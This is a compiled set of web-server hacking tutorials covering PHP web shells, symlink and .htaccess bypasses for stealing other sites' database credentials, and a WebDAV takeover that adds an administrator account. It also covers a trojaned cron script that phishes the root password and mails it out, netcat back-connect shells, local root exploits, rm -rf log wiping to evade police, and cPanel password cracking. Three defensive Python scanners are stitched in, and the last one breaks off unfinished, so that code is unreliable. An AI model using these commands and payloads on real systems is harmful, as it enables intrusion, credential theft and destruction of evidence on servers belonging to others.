SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"
and click 'Go'.
Now the command line is here: http://site.com/cmd.php. Let's run the command to get a shell:
wget http://www.r57.biz/r57.txt;mv r57.txt shell.php
And that's it, we have a shell on the server xD
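As an added defensive example (not part of this guide), the scanner below walks a CMS directory tree and reports files containing the injection idioms shown in the shell-upload section above and in the phpMyAdmin INTO OUTFILE step: command execution fed straight from a request variable, fwrite(fopen($_GET...)), the ${${...}} variable-variable trick, and output-capture wrappers. The sample tree it builds in a temporary directory is constructed for the demo; theme and template paths are those named in the text.

```python
import os
import re
import tempfile

# Signatures drawn from the snippets shown in this guide; each is (label, regex).
SIGNATURES = [
    ("command-exec-from-request",
     re.compile(r'\b(system|shell_exec|exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b')),
    ("arbitrary-write-from-request",
     re.compile(r'fwrite\s*\(\s*fopen\s*\(\s*\$_(GET|POST|REQUEST)')),
    ("remote-fetch-from-request",
     re.compile(r'file_get_contents\s*\(\s*\$_(GET|POST|REQUEST)')),
    ("variable-variable-exec", re.compile(r'\$\{\s*\$\{')),
    ("hidden-output-capture",
     re.compile(r'ob_start\s*\(\s*\)\s*;\s*(system|exec|passthru)\s*\(')),
    ("obfuscated-eval",
     re.compile(r'eval\s*\(\s*(base64_decode|gzinflate|str_rot13|strrev)\s*\(')),
]
# Template engines store PHP under several extensions; .txt covers IPB's help.txt.
SCAN_EXTENSIONS = {".php", ".phtml", ".html", ".htm", ".txt", ".inc"}


def scan_file(path):
    """Return [(label, line_number)] for every signature hit in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    hits = []
    for label, rx in SIGNATURES:
        for m in rx.finditer(content):
            hits.append((label, content.count("\n", 0, m.start()) + 1))
    return hits


def scan_tree(root):
    """Map relative path -> hits for every scanned file with at least one hit."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


def build_demo_site():
    """Create a throwaway tree of constructed files: one clean theme file and
    four that reproduce the injected snippets from the text."""
    root = tempfile.mkdtemp(prefix="cms-demo-")
    samples = {
        "wp-content/themes/demo/404.php":
            "<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n",
        "templates/beez/index.php":
            "<?php\n// constructed Joomla template\n$x = 1;\n"
            "ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();\n",
        "styles/prosilver/template/faq_body.html":
            "<div>faq</div>\n<?php fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); ?>\n",
        "cache/help.txt": "${${print $query='id'}} ${${system($query,$out)}}\n",
        "cmd.php": "<? system($_REQUEST['cmd']); ?>\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_demo_site()).items()):
        print(rel, hits)
```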
Shell Jumping
Requirement: b374k shell
(Click on the link and you will get a PHP file; just right click and select Save, or press Ctrl+S on the keyboard, and save it under any name like hacker.php, myshell.php or darksite.php)
Follow these steps:
 Now, after uploading the shell, click on Local Domain to view all websites hosted on the same server and check which are readable.
 Now choose any website from the local domain list and copy its Senarai User value, then go to Home and paste it in View file/folder after home/, replacing that keyword: home/replacethiskeyword/public_html/
For example, if the current View file/folder value is home/abc/public_html and your target website's Senarai User value (username) is xyz, then the View file/folder value will be home/xyz/public_html/
 After going to that folder, look for the MySQL config (wp-config.php in WordPress and configuration.php for Joomla). Now open the file and you'll get the database username and password there. It will look like:
Username = /** MySQL database username */ define('DB_USER', 'googlyma_wrdp1');
PASSWORD =
/** MySQL database password */
define('DB_PASSWORD', 'PHZ2hum6{{KE');
 Now connect to the MySQL database with the username and password and enter this SQL query:
UPDATE wp_users SET user_pass = md5('123456') WHERE user_login = 'admin';
 Now, after what we have done,
go to http://webste.com/wp-admin/ and log in with the username and password.
Log in with user name admin and password 123456 and you have successfully done it.
Symlink Bypass 2013 for Linux Servers
Note: This method is not applicable for GoDaddy, Bluehost, HostGator and HostMonster servers.
For this you first need the following files:
 Sen Haxor CGI Shell
 sen.zip
 passwd-bypass.php
 Turbo Brute force Cpanel
 Port.py
First, before starting to symlink, we need to create php.ini and ini.php to disable safe mode and disabled functions on the server.
Use the following code: make a php.ini with the line
safe_mode=Off
and ini.php with:
<?php
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
So after creating php.ini and ini.php, upload the other files to the server.
BYPASSING SYMLINK ON PLESK, DEBIAN, CENTOS & REDHAT SERVERS
Now I will explain how to bypass symlink on Plesk, Debian, CentOS and Red Hat.
Commonly all of the above have a root path like
/root/var/www/vhost/
where all sites will be under the vhost directory. But you won't have permission to view it, so we will create a symbolic link to root, view the site and symlink the config files.
Make a new directory in your shell, for example sen, then upload sen.zip. Then use this command to unzip the file and create a symbolic link to root.
Command: unzip sen.zip
Note: On some servers the unzip command won't work, so you can manually create a symlink to root by using the command ln -s / root
Then you will see this:
$ unzip sen.zip
Archive: sen.zip
linking: sen.txt -> /
finishing deferred symbolic links:
sen.txt -> /
This means a symbolic link has been created to / (root).
 Now we need to upload .htaccess; use the following:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
Done, bypassed. Now view /var/www/vhost/ and you will be shown all sites.
BYPASSING SYMLINK ON APACHE AND LITESPEED
Mostly, when you try to symlink an Apache server in 2013 you will face 403 Forbidden, 404 Not Found or 500 Internal Server Error.
These can be bypassed by using different .htaccess files individually.
BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers.
First, for this, make a new directory in your shell, for example sen, then upload sen.sa and .htaccess from the Sen Haxor CGI shell (I added the download link at the end of the tutorial).
After uploading .htaccess and sen.sa to the new directory sen, chmod sen.sa to 0755.
Then open the CGI shell login (password: senhaxor).
Now there are several methods to bypass 403 Forbidden. You need to try all the following methods; at least one will give you success.
Method 1: .shtml method
This is the method commonly used by most hackers to bypass the 403 Forbidden error.
So before we proceed you first need to get all of /etc/passwd from the server so that we can find the usernames and the paths where the sites are located.
On 2013 servers many functions are enabled which show 403 Forbidden when you try to read /etc/passwd from the server with cat, so I made a powerful shell which can bypass this and get /etc/passwd from the server. I will also add it to the downloads.
Upload the /etc/passwd bypasser shell and get all of /etc/passwd.
Then log in to the Sen Haxor CGI shell and create a symbolic link to your target:
 Step 1: ln -s / root
 Step 2: ln -s /home/username/public_html/config.php 1.shtml
For example, if our site is www.site.com, the username is site and it is WordPress:
ln -s /home/site/public_html/wp-config.php 1.shtml
So we created a symbolic link to our target. Now you need to go to your shell and edit the .htaccess with the following code:
Options +FollowSymlinks
DirectoryIndex itti.html
RemoveHandler .php
AddType application/octet-stream .php
Once you have done this, open 1.shtml in your browser, right click and view source. You will be able to view the config.
This is the common way to bypass 403 Forbidden and LiteSpeed.
Now let me explain the advanced method =)
Method 2 : Bypassing Symlinked Config From Cpanel
For this you need at least one cPanel access on the server. I will tell you how to easily crack cPanel.
First run this command: ls /var/mail
Then you will be shown all usernames from the server. Copy all of them.
Now upload the Turbo Brute Force Cpanel script (I will attach it with the downloads).
Open the script and in User paste all the usernames we got.
And for Password, here is the wordlist:
Copy all and paste it in Password, select Simple and click Submit.
If you're lucky you will be shown cracked cPanels.
Once you have a cPanel on the server you can bypass 500 Internal Server Error and 403 Forbidden from port 2077 and from Error Pages in the file manager.
Just symlink the config:
ln -s /home/user/public_html/wp-config.php config.shtml
Log in to the cPanel.
Then go to File Manager -> Error Pages.
Then choose any of these according to what error is triggered when you open your symlinked config:
400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)
Example: "&file=400.shtml&desc=(Bad request)
We can get the config by:
"&file=config.shtml&desc=(Bad request)
BYPASS SYMLINK FROM PORT 2077
So once you have symlinked the config you can just log in to port 2077,
then public_html/path/config.shtml.
You will be able to download config.shtml and view the source.
Method 3 : Symlink Bypass via Open Port using Python
For this we first need Python to be installed on the server.
To check if Python is installed run this command: python -h
If it's installed we can use the following Python script and bypass:
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__ == '__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    httpd = SocketServer.TCPServer(("", port), Handler)
    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://site.com :" + str(port))
    httpd.serve_forever()
I have added the script to the downloads.
Now upload the script to the shell.
now run this command : python port.py
Now Open the site with port 13123
www.site.com:13123
Server Bypassed From Open Port .
Method 4 : Bypassing Symlink Using .ini Method
Log in to the Sen Haxor CGI shell and normally create a symlink to your target with the .ini extension:
ln -s /home/user/public_html/wp-config.php config.ini
Now go to the shell and make a new file a.shtml. Paste the following code inside it:
<!--#include virtual="config.ini"-->
and save it.
Now open a.shtml in the browser, right click and view the source. Done, bypassed.
Method 5: Bypassing Symlink Using ReadMe file
Make a new directory in your shell. From the CGI shell normally symlink the config:
ln -s /home/user/public_html/config.php config.txt
Now make a .htaccess with the following code:
.htaccess
Options All
ReadMeName config.txt
Now when you open the directory in the browser you will be shown the config source directly.
E.g. if site.com/sen/config.txt is your symlinked config, then when you open www.site.com/sen/ your symlinked config will be displayed as the ReadMe content.
That's it, I have explained all the methods to bypass symlink. If you still have problems bypassing, try all the following .htaccess files:
1 - > .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
2 -> .htaccess
Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
3 -> .htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
4 -> .htaccess
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
5 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</IfModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
.htaccess
AddType application/x-httpd-cgi .py
AddHandler cgi-script .py
This one is to make perl work :
.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
This one is to enable Symlink if the function is disabled in the server :
.htaccess
<Directory "/home">
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>
This one is to retrieve users permissions :
.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html
Bypass Internal Server error :
.htaccess
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Change php version:
.htaccess
AddType application/x-httpd-php4 .php
Bypass Uploads Options and upload shell in another extension :
<FilesMatch "^.*.mp3"> SetHandler application/x-httpd-php </FilesMatch>
Retrieve Config with picture method :
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :
www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar
So that's it, I think I have covered everything that's related to bypassing symlink and disabled functions on the server. If you still face problems in symlinking, contact me:
www.facebook.com/cheenu.vis
Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro -
Godzilla - Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya
Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking
Decoder - Rafay Bolach -Mike Wals - Team Indishell and all Indian Hackers
Hack WebDAV & Deface
Alright guys, today in this tutorial I'll be explaining how to use the WebDAV exploit. The link for the tools used in this tutorial can be found at the bottom of this tutorial. For those of you who do not know what WebDAV is, here is the definition:
Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer users to edit and manage files collaboratively on remote World Wide Web servers.
But for our purpose we will be using it to exploit RDPs, or the Remote Desktop Protocol. For a better understanding, these RDPs could range from VPSs to dedis to just plain old home PCs, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene, a shell is a PHP script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available; there are several posted throughout the forum and you can find them by simply using the search button located on the navbar.
Now before being able to use the shell we have to find some vulnerable IPs to gain access to. For this we will be using the WebdavlinkCrawler, which can be found in the WebDAV tool kit I have provided below; if you don't trust my download links, simply don't download them, it's that simple. Once you have managed to open the program you will be presented with this interface.
As you can see there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the Start button and it will begin to search for the IPs with WebDAV on them.
Once you have managed to gather some IPs like you see in the picture here: now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your IPs you're going to want to click one so it's highlighted and then right click it; you will be presented with a popup that looks like this.
I have no idea what that actually means (if someone would like to translate and tell me, please feel free), but what it is doing is copying all of the IPs you have scanned. After you have scanned all of the IPs you're going to want to paste them into a new word document.
Once you have done so, save it as something you can remember and put it in a convenient location. After you have saved your collected WebDAV IPs in a word document you're going to want to open the IP Scanner in the folder. It will look like this.
What you're going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your IPs in place, you're going to want to press the Scan button. What this is doing is taking all of your WebDAV IPs and figuring out which ones are vulnerable to this particular exploit. The ones on the right are the ones it scanned, and if you happen to get any in the middle, those are the ones you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of IPs. After you have managed to gather some IPs in the middle column and are ready to exploit the server, you can double check by going to ip/webdav/ in your browser, the IP being one of the exploitable ones you managed to get, and you're going to be looking for an index page that says "WebDAV Test page". After you have confirmed it is ready to go, you're going to want to open "Map network drive"; this can be found by right clicking Network or My Computer in the Start menu.
What you're going to want to click on is the hyperlink that reads "Connect to a website that you can use to store your documents and pictures". You will be presented with a screen; all you have to do is click Next. And then you're going to want to click "Choose a custom network location".
Now this is the important screen; it should look like this.
What you have to do is put the ip/webdav in the text box and click Next. You should then be prompted with a login box; the default username is wampp and the default password is xampp. Once you have successfully connected you can browse its folders, so what you have to do now is just drag and drop the shell.php inside the main directory.
After doing so go to ip/webdav/shell.php; it should look like the following.
Feel free to use that IP if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell, inside the Execute textbox you're going to want to run the following command:
net localgroup administrators SUPPORT /Add
What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open Remote Desktop and connect using the IP and the login details we have just created.
The shell is for you to explore and discover for yourself. Now you may be wondering: what can you do once you're in?
Answer: 1. You can do so much! Plant rootkits / upload your RAT on the server :D
2. I upload my RATs in case they try to take back their dedi.
3. Host a web IRC bot or shell booter
4. Store files or host websites or shells
5. Make a botnet!
TOOLS:
http://dl.dropbox.com/u/18083172/Webdav%20tools.rar
Root server without local root exploit
Many hackers find it difficult to find a local root exploit for rooting the server. So here are a few methods you could try to gain root access without using a local root exploit!
1. Custom Cron Tab Scripts
Cron jobs are tasks that are set to be executed at a specific time. If the root user has created a custom script used by cron, and we can write to this file, we can send a "fake" error message and the root user will probably type in his password.
First, check whether there are any cron job tasks:
crontab -l
If you see any custom script, we must check whether we can write to it.
Let's say we have a custom script here: /bin/cronscript
To check if we can write to the file, type:
stat /bin/cronscript
(If you get something like "-rwxrwxrwx" in the output, you can edit the file!)
Let's edit the file and send a fake error message.
Make a copy of the original script to /bin/cronscript.bak:
cp /bin/cronscript /bin/cronscript.bak
Edit /bin/cronscript like this:
#!/bin/sh
echo "An System Error Occured!"
echo ""
echo "Error Code: #131425"
echo ""
echo "Update to get the Latest Patch for this Security Issue."
read -s -p "[sudo] password for root " rootpasswd
echo ""
echo "su: Authentication failure"
echo ""
sudo apt-get update && sudo apt-get upgrade
sudo echo "The Password is: $rootpasswd" > .kod
mail -s "Root's Password" "email@address.com" < .kod
rm .kod
mv cronscript.bak cronscript
You should just replace the underlined parts with your e-mail and the name of the script!
After you save the file, type chmod +x cronscript to set it as executable!
This script will:
- Send a fake error message
- Request the root's password
- Send the password to your e-mail address (make sure the "mail" command is available in /bin)
- Restore the original file
When the script gets executed, the root user will enter his password and it will be sent to you!
It would be better if you had some knowledge of Bash programming...
2. Enumerating all SUID Files
An SUID file is any file that any user group has the privileges to access, read and write on it.
What this means for you: you can escalate privileges this way if it is in an important directory.
You can social-engineer a privileged user.
To find all SUID files, type:
find / -user root -perm -4000 -print
This will show all the SUID files in your terminal. Take your time and check them as they can help you to escalate privileges!
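As an added defensive example (not part of this guide), the Python audit below checks the two conditions these methods depend on from the administrator's side: cron-referenced scripts that anyone other than their owner can modify (the "-rwxrwxrwx" case the text checks with stat), and setuid files that are not in a known-good baseline (the text's find / -perm -4000, reduced to what is new). The crontab and the directory it inspects are constructed in a temporary directory for the demo.

```python
import os
import stat
import tempfile


def writable_by_others(path):
    """True when group or world may write the file: the '-rwxrwxrwx' case
    the text checks with stat(1)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def scripts_from_crontab(crontab_text):
    """Absolute command paths referenced by a crontab (output of crontab -l).
    Handles environment lines, comments, 5-field schedules and @-aliases."""
    paths = []
    for line in crontab_text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue
        command = tokens[1:] if tokens[0].startswith("@") else tokens[5:]
        if command and command[0].startswith("/"):
            paths.append(command[0])
    return paths


def audit_cron(crontab_text):
    """Crontab-referenced scripts that a non-root user could edit."""
    return [p for p in scripts_from_crontab(crontab_text)
            if os.path.isfile(p) and writable_by_others(p)]


def find_suid(root, baseline=frozenset()):
    """Regular files under root with the setuid bit, minus a known-good
    baseline. Unlike the text's find command this looks at every owner."""
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and path not in baseline:
                found.append(path)
    return sorted(found)


def build_demo():
    """Constructed layout: one cron script with safe permissions, one that is
    world-writable (the trap the text describes), and one setuid file."""
    root = tempfile.mkdtemp(prefix="cron-demo-")
    safe = os.path.join(root, "cronscript-ok")
    weak = os.path.join(root, "cronscript")
    for path in (safe, weak):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho nightly job\n")
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)
    suid = os.path.join(root, "helper")
    open(suid, "w").close()
    os.chmod(suid, 0o4755)
    crontab = (f"SHELL=/bin/sh\n# constructed crontab\n"
               f"0 * * * * {weak}\n30 2 * * * {safe} --nightly\n@daily /nonexistent/job\n")
    return root, crontab, weak, suid


if __name__ == "__main__":
    root, crontab, weak, suid = build_demo()
    print("cron scripts writable by others:", audit_cron(crontab))
    print("setuid files not in baseline:", find_suid(root))
```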
3. Brute Forcing
I know what you are thinking after seeing the title, but this is different; the tool we are going to use is called Rootdabitch.
What is so special about this?
The magic of this tool is that it works in the background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :)
For this you need a PHP shell / reverse shell / SSH access to the target to run this tool. You can get the tool here: Rootdabitch v0.1
Usage:
./rootdabitch.sh youremail@site.com
For kiddies:
First download rootdabitch to the server:
wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
Extract it with the following command:
unzip rootdabitch-0.1.zip
Chmod it to 755:
chmod +x rootdabitch.sh
Finally run the script:
./rootdabitch.sh youremail@site.com
Simply just chmod it and run the script. If the password is cracked you will get a mail containing the root password, which will be in the file "passwords.txt" attached to the mail.
LINUX SERVER ROOTING
Hello Hax0rtools.com readers, today I will show you how to root a server.
Root is the administrator of the whole server. If someone gets root access he can do anything with the server, like delete and copy anything on the server, and can deface all the home pages (mass deface).
Although there are mainly 3 ways in which you can get into the server, here we will take the first method, that is by local root.
NEEDS:
 Netcat (Download from Here)
 Shelled site (Best Shellz Here)
 Local root exploit (which you can find Here, or download this collection Here)
STEPS:
 In the Run program type cmd, then type this: cd "C:\Program Files\Netcat"
(but first save your netcat in that directory)
After it type this: nc -n -l -v -p 443 , and you will get this -
Now open the URL at which you have uploaded your shell and then connect it using the back connect option in the shell (be careful, some shells do not have this option, and do not use any proxy, Tor or VPN). When the connection is established you will get something like this -
Now you have successfully connected. Then we have to get the local root exploit; for example, now we have 2.6.18-374 2011.
 Now we first have to upload our exploit to a writable folder; simply, we can just change the directory to the /tmp folder, which is a standard writable folder.
Command to change dir to /tmp: cd /tmp
 To upload your exploit we will use wget.
Now type: wget http://www.example.com/exploit.c
Now the exploit will be uploaded to the tmp folder.
(CASE TYPE 1) If you have uploaded your exploit as (exploit.c) then we have to compile it, so to compile it we will type the following command.
Type: gcc exploit.c -o exploit
Note that in the above command exploit refers to the name of your exploit (exploit.c). So if it's properly compiled with no errors & warnings then you can proceed, or if you get an error then find another exploit.
(CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the command below.
Type: unzip exploit.zip
 After we have done all the above steps correctly, it's time to give permission, so we will type the following command
Type: chmod 777 exploit
 Now it's time to run the exploit; to run the exploit we will type the following command
Type: ./exploit
Now the exploit will run & the server will be rooted ;) . To check whether we got root we can type
Type: id or whoami
NOW HOW TO CLEAR THE LOGS AND COME OUT SAFELY FROM THE SERVER
If you do not want to get caught by the cops then delete the logs using the following commands:
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name '*.bash_history' -exec rm -rf {} \;
find / -name '*.bash_logout' -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name '*.log' -exec rm -rf {} \;
I hope you have learned how to root a server. My next tutorial will be about how to mass deface after rooting a server.
Cpanel Cracking
Things Required:
 Shelled site (Download Best Shellz Here)
 Cpanel Password Cracker (Download; password: www.hax0rtools.com)
Step By Step Tutorial:
 First open your shell & upload the cPanel password cracker shell.
 Then go down & click on User.
 Now after you have clicked on User, below you will get all the usernames of the cPanel. So now move to the next step: your next step will be to get a good password list for a dictionary attack. After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block. Then finally click on Start.
Tip: The password list should be short & effective.
 When the cracking is finished, you will see the result.
 After getting the login info you can log in by going to -> www.site.com:2082 or www.site.com/cpanel
Bypass 403 Forbidden And Can't Read /etc/named.conf Error
Nowadays most Linux kernel servers show this error when you try to symlink the server. Most of the servers which show 403 Forbidden have the "can't read named.conf" error when you try to symlink using scripts like Symlink_Sa or the Madspot Security Team shell or whatever script is used for automated symlinking.
This can be bypassed by reading /etc/passwd, and Symlink_Sa 3.0 can be used to bypass this.
I will be posting the download link of some shells I will be using in this tutorial.
The best scripts which can bypass "can't read /etc/named.conf" are:
1. Config Fucker by Web Root Hack Tools (mass symlink config files)
2. Config Killer by Team Indishell (mass symlink config files, PHP based script)
3. Symlink Pain [~] allsoft.pl (Perl script to mass symlink config files)
4. Symlink_Sa 3.0 automated symlink script
Usage: for Config Fucker, Config Killer and the Symlink Pain [~] Perl script, just upload them onto the server, making sure that you create a new directory. Upload the script and use the command cat /etc/passwd to read all of /etc/passwd from the server, copy it, then just open your script, paste it there and click on Get Config, and you're done. Just open the link of the folder you created; e.g. if the script is at site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there.
Note: It's better to create a php.ini file before you do this for a 100% result.
I will post the download link for all 4 shells I have mentioned.
And I will be using another private shell for this which I won't be giving you all, for priv8 issues; it's the Mannu shell coded by Team Indishell, which can bypass the "can't read /etc/named.conf" error easily. But a 403 Forbidden server can't be bypassed using this shell.
So now if we can't symlink to the public_html/ of the website we can use the Symlink_sa 3.0 script's Symlink Bypass option -
So now we can easily symlink to the /public_html/ path of each website.
Now some servers show a 403 Forbidden error when you try to symlink them, so now let's see how to bypass this shit.
For the 403 Forbidden error I will be using the following shells:
1. Dhanush Shell coded by Arjun (this shell automatically creates .htaccess, php.ini and ini.php files after you log in)
2. Mannu Shell by Team Indishell, private!
3. Symlink_sa 3.0 script
I will be posting the download link of the Dhanush shell and Symlink_sa 3.0 (the Mannu shell is private as I already told you).
So what is the trick that makes us bypass 403 Forbidden? It's just the .htaccess and php.ini which contain the following code:
.htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
php.ini
<?php
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
1.) 403 Forbidden error:
2.) Open the Dhanush shell, which automatically creates .htaccess, php.ini and ini.php.
3.) Mannu shell to check if we bypassed the 403 error:
4.) Bypassed 403 Forbidden and access to the public_html/ path.
Bypassed "can't read /etc/named.conf" and 403 Forbidden error.
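As an added defensive example (not part of this guide), the Python audit below serves both the "Symlink Bypass 2013" section and this 403/named.conf section: run against a hosting account's document root, it reports symlinks that resolve outside the account (to / or to another account's wp-config.php), .htaccess files carrying the directives the text relies on (serving .php as text, removing the PHP handler, FollowSymLinks, ReadMeName, SecFilterEngine Off, suPHP_ConfigPath, CGI handlers), and .shtml files with SSI includes. The two-account layout it builds in a temporary directory is constructed for the demo.

```python
import os
import re
import tempfile

# .htaccess directives this guide uses to turn the web server into a config-file reader.
RISKY_HTACCESS = [
    ("php-served-as-text", re.compile(r'^\s*AddType\s+(text/plain|txt)\s+.*\.php', re.I | re.M)),
    ("php-handler-removed", re.compile(
        r'^\s*(RemoveHandler\s+\.php|AddType\s+application/octet-stream\s+.*\.php'
        r'|AddHandler\s+(server-parsed|txt)\s+.*\.php)', re.I | re.M)),
    ("symlinks-followed", re.compile(r'^\s*Options\b.*\b(FollowSymLinks|All)\b', re.I | re.M)),
    ("readme-include", re.compile(r'^\s*ReadMeName\b', re.I | re.M)),
    ("modsecurity-disabled", re.compile(r'^\s*SecFilterEngine\s+Off', re.I | re.M)),
    ("php-ini-override", re.compile(r'^\s*suPHP_ConfigPath\b', re.I | re.M)),
    ("cgi-handler-added", re.compile(r'^\s*AddHandler\s+cgi-script\b', re.I | re.M)),
]
SSI_INCLUDE = re.compile(r'<!--#include\s+(virtual|file)=', re.I)


def audit_htaccess(text):
    """Labels of risky directives present in one .htaccess body."""
    return [label for label, rx in RISKY_HTACCESS if rx.search(text)]


def audit_symlinks(docroot, allowed_root):
    """(relative link, resolved target) for every symlink under docroot whose
    target resolves outside allowed_root. Links staying inside the account are fine."""
    allowed_root = os.path.realpath(allowed_root)
    bad = []
    for dirpath, dirnames, filenames in os.walk(docroot):  # os.walk does not follow links
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.path.realpath(path)
                if os.path.commonpath([target, allowed_root]) != allowed_root:
                    bad.append((os.path.relpath(path, docroot), target))
    return sorted(bad)


def audit_tree(docroot, allowed_root):
    """Combine the symlink, .htaccess and .shtml checks for one document root."""
    report = {"symlinks": audit_symlinks(docroot, allowed_root), "htaccess": {}, "ssi": []}
    for dirpath, _, filenames in os.walk(docroot):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # reported above; never read through a link
            rel = os.path.relpath(path, docroot)
            with open(path, encoding="utf-8", errors="replace") as fh:
                body = fh.read()
            if name == ".htaccess" and audit_htaccess(body):
                report["htaccess"][rel] = audit_htaccess(body)
            elif name.endswith(".shtml") and SSI_INCLUDE.search(body):
                report["ssi"].append(rel)
    return report


def build_demo():
    """Constructed two-account layout mirroring the text: home/me is the
    attacker-controlled account, home/other the victim whose config is targeted."""
    base = tempfile.mkdtemp(prefix="symlink-demo-")
    other = os.path.join(base, "home", "other", "public_html")
    me = os.path.join(base, "home", "me")
    sen = os.path.join(me, "public_html", "sen")
    os.makedirs(other)
    os.makedirs(sen)
    with open(os.path.join(other, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")
    with open(os.path.join(sen, ".htaccess"), "w") as fh:  # Method 1's .htaccess
        fh.write("Options +FollowSymlinks\nDirectoryIndex itti.html\n"
                 "RemoveHandler .php\nAddType application/octet-stream .php\n")
    with open(os.path.join(sen, "a.shtml"), "w") as fh:  # Method 4's SSI include
        fh.write('<!--#include virtual="config.ini"-->\n')
    os.symlink(os.path.join(other, "wp-config.php"), os.path.join(sen, "1.shtml"))
    os.symlink("/", os.path.join(sen, "root"))  # the text's "ln -s / root"
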